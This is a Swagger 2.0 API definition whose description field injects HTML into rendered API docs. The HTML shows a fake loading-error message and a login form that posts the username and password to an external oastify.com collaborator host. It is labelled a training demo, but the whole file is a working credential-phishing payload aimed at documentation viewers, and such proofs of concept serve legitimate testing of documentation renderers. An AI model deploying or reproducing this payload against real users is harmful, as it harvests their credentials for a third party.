swagger: '2.0'
info:
  version: 1.0.0
  title: Demo Login Page
  description: '<div class="login-form">

<!-- Demo Warning -->
<div style="width: 100%; max-width: 400px; margin: 20px auto; padding: 15px; background: #fff3cd; border-radius: 8px; border: 1px solid #ffeeba; text-align: center;">
  <strong>Training / Demo Only</strong><br>
  No real credentials are collected.
</div>

<!-- Error Message -->
<div style="width: 100%; max-width: 400px; margin: 20px auto; padding: 20px; background: #f8d7da; border-radius: 8px;">
  <div style="color: #721c24; font-size: 16px; text-align: center;">
    <strong>An error occurred while loading, please log in.</strong>
  </div>
</div>

<!-- Login Form -->
<div class="heading">
  <h1 style="text-align: center; font-size: 24px; color: #333;">Login Page</h1>
  <div style="width: 100%; max-width: 400px; margin: 0 auto; padding: 20px; background: #fff; border-radius: 8px;">
    <form action="https://ophso254w83ihwlwtwls7pmj0a61uwil.oastify.com/demo-login" method="post">

      <div style="margin-bottom: 15px;">
        <label style="font-size: 14px;">Username</label>
        <input type="text" name="username" value="enter_username" 
               style="width: 100%; padding: 10px; border: 1px solid #ccc;">
      </div>

      <div style="margin-bottom: 15px;">
        <label style="font-size: 14px;">Password</label>
        <input type="password" name="password" value="demo_pass" 
               style="width: 100%; padding: 10px; border: 1px solid #ccc;">
      </div>

      <button type="submit"
              style="width: 100%; padding: 12px; background-color: #5cb85c; color: white; border: none;">
        Login 
      </button>
    </form>
  </div>
</div>

<!-- Footer -->
<div style="position: fixed; bottom: 10px; right: 10px; font-size: 12px; color: #888;">
  Demo PoC – Security Training
</div>'
paths:
  /demo-login:
    post:
      responses:
        '200':
          description: login received
